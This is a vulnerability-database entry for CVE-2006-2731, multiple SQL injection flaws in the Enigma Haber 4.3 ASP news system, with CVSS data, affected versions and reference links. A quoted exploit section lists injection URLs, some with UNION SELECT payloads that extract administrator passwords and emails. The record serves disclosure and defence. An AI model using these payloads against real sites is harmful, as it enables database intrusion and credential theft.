CVE-2006-2731
CVSS 7.5
Published: 2006-06-01 06:02:00
Last revised: 2013-07-23 02:31:21

[Original] Multiple SQL injection vulnerabilities in Enigma Haber 4.3 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) id parameter in (a) e_mesaj_yas.asp, (b) edi_haber.asp, and (c) haber_devam.asp; (2) hid parameter in (d) yazdir.asp and (e) yorum.asp, and the (3) e parameter in (f) arsiv.asp. NOTE: with administrator credentials, additional vectors exist including (4) yid parameter to (g) admin/y_admin.asp, (5) bid parameter to (h) admin/reklam_detay.asp, hid parameter to (i) admin/detay_yorum.asp and (j) admin/haber_sil.asp, (6) kid parameter to (k) admin/kategori_d.asp, (7) tur parameter to (l) admin/haber_ekle.asp, (8) s parameter to (m) admin/e_mesaj_yaz.asp, and id parameter to (n) admin/admin_sil.asp.


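[CNNVD] Enigma Haber multiple SQL injection vulnerabilities (CNNVD-200606-029)

Enigma Haber contains multiple SQL injection vulnerabilities. Remote attackers can execute arbitrary SQL commands via the (1) id parameter in (a) e_mesaj_yas.asp, (b) edi_haber.asp and (c) haber_devam.asp; the (2) hid parameter in (d) yazdir.asp and (e) yorum.asp; and the e parameter in (f) arsiv.asp. Note: with administrator credentials, additional vectors exist: the (4) yid parameter to (g) admin/y_admin.asp, the (5) bid parameter to (h) admin/reklam_detay.asp, the hid parameter to (i) admin/detay_yorum.asp and (j) admin/haber_sil.asp, the (6) kid parameter to (k) admin/kategori_d.asp, the (7) tur parameter to (l) admin/haber_ekle.asp, the (8) s parameter to (m) admin/e_mesaj_yaz.asp, and the id parameter to (n) admin/admin_sil.asp.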

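- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]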

- CPE (affected platforms and products)

cpe:/a:enigma_haber:enigma_haber:4.3
cpe:/a:enigma_haber:enigma_haber:4.2

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2731
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2731
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-029
(official data source) CNNVD

- Other links and resources

http://www.vupen.com/english/advisories/2006/2032
(UNKNOWN)  VUPEN  ADV-2006-2032
http://www.securityfocus.com/bid/18148
(UNKNOWN)  BID  18148
http://www.securityfocus.com/archive/1/archive/1/435282/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060528 Advisory: Enigma Haber <= 4.3 Multiple Remote SQL Injection Vulnerabilities
http://www.osvdb.org/26119
(UNKNOWN)  OSVDB  26119
http://www.osvdb.org/26118
(UNKNOWN)  OSVDB  26118
http://www.osvdb.org/26117
(UNKNOWN)  OSVDB  26117
http://www.osvdb.org/26116
(UNKNOWN)  OSVDB  26116
http://www.osvdb.org/26115
(UNKNOWN)  OSVDB  26115
http://www.osvdb.org/26114
(UNKNOWN)  OSVDB  26114
http://www.osvdb.org/26113
(UNKNOWN)  OSVDB  26113
http://www.osvdb.org/26112
(UNKNOWN)  OSVDB  26112
http://www.osvdb.org/26111
(UNKNOWN)  OSVDB  26111
http://www.osvdb.org/26110
(UNKNOWN)  OSVDB  26110
http://www.osvdb.org/26109
(UNKNOWN)  OSVDB  26109
http://www.osvdb.org/26108
(UNKNOWN)  OSVDB  26108
http://www.osvdb.org/26107
(UNKNOWN)  OSVDB  26107
http://www.osvdb.org/26106
(UNKNOWN)  OSVDB  26106
http://www.nukedx.com/?viewdoc=34
(UNKNOWN)  MISC  http://www.nukedx.com/?viewdoc=34
http://www.nukedx.com/?getxpl=34
(UNKNOWN)  MISC  http://www.nukedx.com/?getxpl=34
http://securitytracker.com/id?1016171
(UNKNOWN)  SECTRACK  1016171
http://secunia.com/advisories/20357
(VENDOR_ADVISORY)  SECUNIA  20357
http://xforce.iss.net/xforce/xfdb/26837
(UNKNOWN)  XF  enigmahaber-multiple-sql-injection(26837)
http://securityreason.com/securityalert/1003
(UNKNOWN)  SREASON  1003

- Vulnerability information

Enigma Haber multiple SQL injection vulnerabilities
High risk  SQL injection
2006-06-01 00:00:00 2006-06-01 00:00:00
Remote

- Advisories and patches

No data available

- Vulnerability information (1840)

Enigma Haber <= 4.3 Multiple Remote SQL Injection Vulnerabilities (EDBID:1840)
asp webapps
2006-05-28 Verified
0 nukedx
N/A
Enigma Haber <= 4.3 Multiple Remote SQL Injection Vulnerabilities
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploit works on Enigma Haber <= 4.3
Original advisory can be found at: http://www.nukedx.com/?viewdoc=34
http://[site]/enigmadir/e_mesaj_yaz.asp?id=1879586820+UNION+SELECT+0,sifre,2,3,4,5,6,7,8,9,10,110,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+yonet+where+yonetid=1144931586
http://[site]/enigmadir/yazdir.asp?hid=SQL
http://[site]/enigmadir/yorum.asp?hid=SQL
http://[site]/enigmadir/edi_haber.asp?id=SQL&tur=1
http://[site]/enigmadir/ara.asp?yo=1&ara=SQL&ko=0&k=0&d=hid&e=desc&ay=00&yil=00
http://[site]/enigmadir/arsiv.asp?d=hid&e=desc+UNION+SELECT+0,sifre,isim,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+yonet+where+yonetid%20like%201144927664&ay=00&yil=00&e_kad=00
http://[site]/enigmadir/haber_devam.asp?id=SQL
The examples below need admin rights.
http://[site]/enigmadir/admin/y_admin.asp?yid=SQL
http://[site]/enigmadir/admin/y_admin.asp?yid=34+UNION+SELECT+0,1,mail,3,4,5,sifre,isim,8,9,sehir+from+yonet+where+yonetid=1144927664
http://[site]/enigmadir/admin/reklam_detay.asp?bid=SQL
http://[site]/enigmadir/admin/detay_yorum.asp?hid=SQL
http://[site]/enigmadir/admin/haber_sil.asp?hid=SQL
http://[site]/enigmadir/admin/kategori_d.asp?o=1&kid=SQL
http://[site]/enigmadir/admin/haber_ekle.asp?tur=SQL
http://[site]/enigmadir/admin/e_mesaj_yaz.asp?s=SQL
http://[site]/enigmadir/admin/admin_sil.asp?id=SQL

# nukedx.com [2006-05-27]

# milw0rm.com [2006-05-28]
		

- Vulnerability information

26106
Enigma Haber e_mesaj_yas.asp id Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- Vulnerability description

Enigma Haber contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the e_mesaj_yas.asp script not properly sanitizing user-supplied input to the 'id' variable. This may allow an attacker to inject or manipulate SQL queries in the back-end database.

- Timeline

2006-05-28 2006-05-27
2006-05-28 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- Related references

- Vulnerability author
